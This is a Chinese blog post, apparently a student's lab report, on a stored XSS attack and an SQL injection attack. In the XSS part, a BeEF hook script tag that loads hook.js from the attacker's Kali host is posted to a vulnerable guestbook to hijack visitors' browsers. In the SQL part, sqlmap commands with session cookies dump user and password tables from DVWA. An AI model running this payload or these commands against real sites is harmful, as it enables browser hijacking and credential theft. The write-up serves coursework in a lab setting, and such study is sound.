蒟蒻信安笔记3:XSS与SQL注入

最新推荐文章于 2024-09-11 10:18:51 发布
最新推荐文章于 2024-09-11 10:18:51 发布
阅读量204 收藏
点赞数
分类专栏: 实验 文章标签: mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SilentNumen/article/details/111397564
版权

一、XSS部分:利用Beef劫持被攻击者客户端浏览器。

实验环境搭建。
角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)
攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
被攻击者:访问留言簿网站,浏览器被劫持。
在这里插入图片描述

1、 利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞。
在这里插入图片描述

2、 Kali使用beef生成恶意代码,截图。
在这里插入图片描述

打开kali的浏览器,输入网址进入此界面
在这里插入图片描述

登陆后访问hook.js,发现恶意代码

在这里插入图片描述

3、 访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板,< script src=“http://Kali的IP地址:3000/hook.js”>,截图。
在这里插入图片描述

4、 管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置截图。
在这里插入图片描述
在这里插入图片描述

5、 回答问题:实验中XSS攻击属于哪种类型?
本次实验是存储型 XSS 漏洞

二、SQL注入部分:DVWA+SQLmap+Mysql注入实战

实验环境搭建。启动Metasploitable2虚拟机。
用 kali 访问 Metasploitable2 的 dvwa
1、 注入点发现。首先肯定是要判断是否有注入漏洞。

在这里插入图片描述

在输入框输入1,返回
ID: 1
First name: admin
Surname: admin
返回正常;
再次输入1’,报错,返回
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘1’’’ at line 1
此时可以断定有SQL注入漏洞,
http://IP地址/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#
下面利用SQLMap进行注入攻击。将DVWA安全级别设置为最低;
2、枚举当前使用的数据库名称和用户名。

在这里插入图片描述

你输入的命令:
Sqlmap -u “http://192.168.43.25/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie=‘security=low;PHPSESSID=g9799k2hrv3qkujhn38vut3up5’ -b --current-db --current-user
Sqlmap输出截图。

在这里插入图片描述

3、枚举数据库用户名和密码
你输入的命令:
sqlmap -u “http://192.168.43.25/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie=‘security=low;PHPSESSID=g9799k2hrv3qkujhn38vut3up5’ --users --password

Sqlmap输出截图。在这里插入图片描述

4、枚举数据库
–dbs:枚举当前数据库
你输入的命令:
sqlmap -u “http://192.168.43.25/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie=‘security=low;PHPSESSID=g9799k2hrv3qkujhn38vut3up5’ --users --password
Sqlmap输出截图。
在这里插入图片描述

5、枚举数据库和指定数据库的数据表
-D 数据库名:指定数据库
–tables:枚举指定数据库的所有表
你输入的命令:
sqlmap -u “http://192.168.43.25/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie=‘security=low;PHPSESSID=g9799k2hrv3qkujhn38vut3up5’ -D dvwa --tables

Sqlmap输出截图。在这里插入图片描述

6、获取指定数据库和表中所有列的信息
-D:指定的数据库
-T:指定数据库中的数据表
–columns:获取列的信息
你输入的命令:
sqlmap -u"http://192.168.43.25/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie=‘security=low;PHPSESSID=g9799k2hrv3qkujhn38vut3up5’ -D dvwa -T users --columns
Sqlmap输出截图。在这里插入图片描述

7、枚举指定数据表中的所有用户名与密码,并down到本地。
-C:枚举数据表中的列
–dump:存储数据表项

你输入的命令:
sqlmap -u “http://192.168.43.25/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#” --cookie=‘security=low;PHPSESSID=g9799k2hrv3qkujhn38vut3up5’ -D dvwa -T users -C user,password --dump
Sqlmap输出截图。在这里插入图片描述

枚举数据表中的用户和密码:
查询到users数据表中有那么多的字段,我们想要的数据应该就在user和password中了
sqlmap -u “http://10.34.80.4/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie “security=low; PHPSESSID=edc3d366bb72538cb8af3df2bbf19979” -D dvwa -T users -C user,password --dump
这里会询问你是否使用Kali中自带的字典进行攻击,选择是
在这里插入图片描述

SilentNumen
关注
专栏目录
哈希算法_学习笔记
02-23
哈希
洛谷5365题解_学习笔记
02-23
https://www.luogu.com.cn/problem/P5365 这道DP
【白帽子学习笔记XSSSQL注入
python_LC_nohtyp的博客
11-17 1801
【白帽子学习笔记XSSSQL注入 yysy姚总布置的实验报告越来越难写了,菜菜的我要写好久,┭┮﹏┭┮ 文章目录【白帽子学习笔记XSSSQL注入0x01 实验知识点1x01 什么是XSS?1x02 什么是Cookie?1x03 XSS漏洞的分类1x04 SQL注入攻击0x02 XSS部分:Beef1x01 搭建GuestBook网站1x02 AWVS扫描1x03 Kail中使用Beef生成恶意代码1x04 XSS注入漏洞2x01 XSS劫持网站2x02 劫持浏览器指定被劫持网站为学校主
信安笔记1:网络扫描与网络侦查
SilentNumen的博客
11-08 783
网络渗透测试实验一1.搜索麻省理工学院网站含“network security” 的pdf文档2.搜索照片中的位置信息3.手机位置定位4.Base64编码解码5.地址信息5.1 MAC:98-CA-33-02-27-B5 访问 202.193.64.345.2 比较https://whatismyipaddress.com得到ip地址 与 从自己主机查到的ip地址6.NMAP使用(而后单独更新)7.zoomeye搜索西门子工控设备8.Winhex简单数据恢复与取证8.1 修复jpg文件8.2 笑
(补)信安笔记1.5:(Nmap的使用部分)原来是这么个神奇的原因导致无法进行
SilentNumen的博客
11-17 913
Nmap的基本使用 之前进行实验一的时候,按照学到的nmap使用方法,扫描自己所在的网段的时候,能扫到的端口永远都只有一个,正常进行的时候应该是扫描总计256个端口,尝试更改过虚拟机的网络配置,也仍然没能解决。 今天偶然回忆起之前学过的一些关于80端口的小知识,突然灵机一动,似乎以前在进行某次小实验的时候有用到80端口——————用织梦系统建网站。 打开织梦系统后,发现上次的服务果然忘记关上了。将织梦系统相关服务关闭后,实验终于能如愿正常进行了。但是当我想再用织梦系统重现这种影响的时候,尝试了几次却又无法重
の小窝:(stringstream)
weixin_45961841的博客
01-30 1803
大一的第一篇博客 介绍一下string 转int float double类型的方法 写给自己看 怕忘记 #include<bits/stdc++.h> using namespace std; int main() { string b; int i; cin>>b; stringstream p; p<<b; p>>i; cou...
NCTF-南邮网络攻防平台WriteUp:SQL注入1
1cePeak
03-30 1388
****************萌新拿一血**************** SQL注入1 传送门:http://chinalover.sinaapp.com/index.php 先看源码 划重点(敲黑板 题目要求输入user,password,我们要避开密码的验证,可以构造语句,在输入user的时候把后面的password用#注释掉。 输入 admin‘)#  因...
2024五一 day3 笔记
wmoia的博客
05-05 914
并查集是一种树型的数据结构,用于处理一些不相交集合的合并及查询问题(即所谓的并、查)。比如说,我们可以用并查集来判断一个森林中有几棵树、某个节点是否属于某棵树等。
[4] SQL 注入(七月最佳)
Debroon
12-02 1922
SQL 注入十分普遍,新闻➡️《报告称 超 6 成 Web应用程序攻击来自SQL注入》。 如上所述,SQL注入攻击 或 SQLi 是一种通过将恶意SQL语句插入其输入字段以供执行来利用SQL语句的基础漏洞的方法。 起于 1998 年一名叫 Rfp 的黑客发表的一篇文章。 从那时起,TA主要针对零售商和...
算法学习笔记:爬山法与模拟退火
maxtir的博客
01-10 521
bzoj3680: 吊打XXX Description gty又虐了一场比赛,被虐的们决定吊打gty。gty见大势不好机智的分出了n个分身,但还是被人多势众的抓住了。们将 n个gty吊在n根绳子上,每根绳子穿过天台的一个洞。这n根绳子有一个公共的绳结x。吊好gty后们发现由于每个gty重力不同,绳 结x在移动。wangxz脑洞大开的决定计算出x最后停留处的坐标,由于
真香!一款超级强大的SQL工具
Rocky0429
10-15 4215
作者 | Rocky0429 来源 | Python空间 大家好,我是 Rocky0429,一个超级哇塞的… 作为新一代的无情取数机,SQL 最近在我日常使用中占据了越来越大的比重,对 SQL 周边的挖掘成了我最近为数不多的消遣。 有道是土豆子哪里去挖,郊区里去挖,一挖一麻袋,挖的多了,就容易瘦,阿不,就容易出好东西… 今天就给大家介绍一个最近挖到的好东西,一个超级强大的 SQL 可视化工具 - Franchise,带有 notebook 界面,作为一个 Jupyter noteb..
笔记:计算机网络-应用层
09-29
- 《计算机网络——自顶向下方法》应用层笔记
数据库运维实操优质文章文档分享(含Oracle、MySQL等) | 2024年8月刊
Era666的博客
09-10 1895
本文为大家整理了墨天轮数据社区2024年8月发布的优质技术文章、文档,主题涵盖Oracle、MySQL、PostgreSQL等主流数据库系统以及国产数据库的技术实操!
MySQL 大量 IN 的查询优化
xchenhao 的博客
09-09 594
MySQL 大量 IN 的查询优化
mysqlmysql之优化
最新发布
zerotoall的博客
09-11 2698
数据库优化   一、数据库硬件优化(选型)    1.一般数据库选择    2.数据库类型    3.硬件选型    4.操作系统优化    5.应用端优化   二、创建数据库    1.创建一个库一个表,并插入100万数据    2.查看数据可用性    3.进行压力测试   三、数据库参数优化    1.Max_connections    2.back_log    3.wait_timeout和interactive_timeout   
基于SpringBoot+Vue+MySQL的校园生活服务平台
程序员大金的博客
09-10 959
基于SpringBoot+Vue+MySQL的校园生活服务平台,附源码。
MySQL MHA
2201_75549363的博客
09-09 937
该参数代表忽略上次 MHA 触发切换产生的文件,默认情况下,MHA 发生切换后会在日志记录,也就是上面设置的日志app1.failover.complete文件,下次再次切换的时候如果发现该目录下存在该文件将不允许触发切换,除非在第一次切换后收到删除该文件,为了方便,这里设置为--ignore_last_failover。master_ip_failover_script=/usr/local/bin/master_ip_failover  #设置自动failover时候的切换脚本,也就是上面的那个脚本。
MySQL的DDL、DML、DQL
liuchanj的博客
09-07 1572
DDL:数据定义语言查询所有数据库:show databases;查询当前数据库:show databases();使用数据库:use 数据库名;创建数据库:create database [if not exists] 数据库名;删除数据库:drop database [if exists] 数据库名;创建表:create table 表名(字段1 字段1类型 [约束] [comment 字段1注释 ],
已知奶茶店的种类和价格对应的字典数据,键值对格式:“奶茶名:价格”。{"原味冰奶茶":3,"香蕉冰奶茶":5,"草莓冰奶茶":5,"冰奶茶":7,"珍珠冰奶茶":7}请设计一个程序实现奶茶的购买和计价功能。输入购买的奶茶名和数量,自动计算金额。可实现多次购买,并计算输出最后的总价
03-27
tea_dict = {"原味冰奶茶":3,"香蕉冰奶茶":5,"草莓冰奶茶":5,"冰奶茶":7,"珍珠冰奶茶":7} total_price = 0 while True: tea_name = input("请输入购买的奶茶名(输入Q结束购买):") if tea_name == "Q": ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值